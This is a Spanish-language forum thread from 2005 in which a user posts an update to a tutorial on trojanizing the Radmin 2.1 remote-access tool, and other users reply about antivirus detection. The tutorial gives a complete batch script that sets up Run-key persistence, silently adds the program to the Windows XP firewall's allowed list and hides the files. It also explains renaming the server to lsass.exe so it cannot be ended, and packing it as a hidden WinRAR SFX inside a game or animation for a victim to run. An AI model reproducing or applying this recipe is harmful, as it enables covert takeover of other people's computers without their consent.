actualizacion de troyanizando radmin

Iniciado por octalh, 23 Septiembre 2005, 22:03 PM

0 Miembros y 1 Visitante están viendo este tema.

octalh



ACTUALIZACION TROYANIZANDO RADMIN 2.1

By Octalh


Bueno antes que nada saludos a toda la gente del foro, ya tenia tiempo que no me pasaba por aqui... esque e andado algo desorientado pero bueno...

Debido a que en mi tutorial de troyanizando radmin se explica un metodo para empaquetarlo con una herramienta que ya es detectada por los AV me decidi a escribir esta actualizacion donde explicare otro metodo para empaquetarlo y que es 100 % indetectable a los av 

seria bueno que algun moderador editara este post y lo ponga en el otro post donde esta el tutorial de esa forma queda junto y no se pierde el hilo

bueno vamos a usar solamente una herramienta y lo mejor es que probablemente muchos ya la tienen instalada, ademas usare un metodo que descubri para brincarnos el FW del XP pero sin desactivarlo ya que si detenias el servicio a nuestra victima le salia un letrerito advirtiendole de su seguridad.. aaaa y ademas haremos que nuestro radmin no pueda ser cerrado desde el administrador de tareas 

ok si ya estan todos listos empezamos este tutorial

lo primero sera bajarnos en caso de que no lo tengan un programa que sirve para empaquetar archivos en .rar se llama WINRAR pues lo vamos a usar como joiner.

nos vamos a crear una carpeta y dentro de ella meteremos el server de radmin junto con su dll asi no hacemos desorden


r_server.exe


AdmDll.dll

bueno ahora renombramos el server de radmin por uno de estos nombres:

lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exe


la razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui http://lympex.sosvulnerable.net/resources/advisories/bug_proc_taskmgr.htm

despues le cambiaremos el icono por el del archivo original  quedando de la siguiente forma:

lsass.exe
  <===== r_server.exe

para cambiar el icono usaremos reshacker es una herramienta indispensable que ya todos deben tener.

ok con esto ya no podran cerrarlo desde el administrador de tareas, si lo intentan este sera el resultado



bien ya que esta renombrado y con nuevo icono procederemos a crearnos un bat, este como siempre agregara las llaves en el registro y ademas hara que el radmin pase el fw del xp sin tener que desactivarlo.

codigo del bat

@echo off
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000" /f
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lsass /t REG_SZ /d "%windir%\lsass.exe" /f

REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\WINDOWS\lsass.exe /t REG_SZ /d "C:\WINDOWS\lsass.exe:*:Enabled:lsass" /f

attrib +h +s c:/windows/bin.bat
attrib +h +s c:/windows/lsass.exe

exit


si se fijan en el registro en la siguiente clave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida  ;D

tambien añade atributos de archivo del sistema y oculto de esa forma no se pueden ver, ni con la opcion de mostrar archivos y carpetas ocultos, tienen que tener activada la otra opcion de mostrar archivos ocultos del sistema

el nombre del bat puede ser el que ustedes quieran yo le puse al mio bin.bat

bien ya que tenemos todo listo en nuestra carpeta procederemos empaquetarlo  ::)

Se supone para este punto ya todos deben tener instalado WINRAR y si no es asi pues instalalo rapido porque ya es hora de darle uso

seleccionaremos los 3 archivos que tenemos

lsass.exe
AdmDll.dll
bin.bat


le daremos boton derecho del mouse, y le daremos en la opcion

Add to archive...

una ves en el menu vamos a palomear la opcion

Create SFX archive



ahora nos vamos a la pestaña avanced y le damos click al boton SFX options

ahora en donde dice patch to extract escribiremos

c:\windows

y en run after extraction el nombre del bat en mi caso bin.bat



ahora nos dirigimos a la pestaña Modes y palomeamos

Hide all
Overwrite all files


de esta forma extrae todo de forma oculta y ademas en caso de que ya exsitan esos archivos los sobreescribe

ahora ya le dan en aceptar y esperan a que el winrar cree el .exe

pues bien ahora ya tienen el radmin empaquetado y con un doble click se instalara en el sistema de la victima, pueden empaquetarlo junto con un juego, un programa o una animacion en flash de esa forma mientras ven la animacion radmin es instalado en el sistema  ;D y estara listo para usarse hasta el proximo reinicio.

Bien aqui termino este tutorial espero les guste, puedes distribuirlo siempre y cuando respetes las fuentes y no modifiques el texto.

Salu2 y suerte  ;D

www.codeprojecteam.com

carlipus

ojala funcione!!!!
Ahora mismo voy a probarlo y comento que tal me ha ido ;)

Saludos

carlipus

acabo de probarlo con migo mismo, no me va. :(

octalh

#3
Algo haces mal yo lo probe en windows XP con SP2 y funciono perfectamente revisa el bat alomejor y no esta bien hecho recuerda que el foro corta el codigo para que quepa aa y ademas revisa que tengas la versión 2.1 de radmin ya que la 2.2 es diferente

SeniorX

nsoe que pasa con mi windows pero el reshacker no se ven bien los caracteres... que puede ser?
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

SeniorX

Detectado por VirusScan.... es obvio, si buscas en google sobre admdll.dll veras que ya todos lo conocen como remote-admin.
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

katanaia

Todo muy bonito pero el NOD32 lo detecta de una. Asi que lo de 100% indetectable es cualquiera.

SeniorX

yo creo que todos los antivirus lo detectan la verdad.... mas que nada por el admdll.dll
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

_R€d_

Citarbueno ahora renombramos el server de radmin por uno de estos nombres:

lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exe

la razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui

Interesante; no me habia enterado muy bien de eso; pero lo tengo claro...lo del firewall del xp es una lastime que no este protegida bajo el registro...Saludos.

octalh

#9
mm que mala suerte, yo uso kav y no lo detecta. lo del indetectable lo dije por el joiner que usaba....

por lo del nod solo me preocupo por su heuristica de ahí en fuera se pueden modificar las firmas..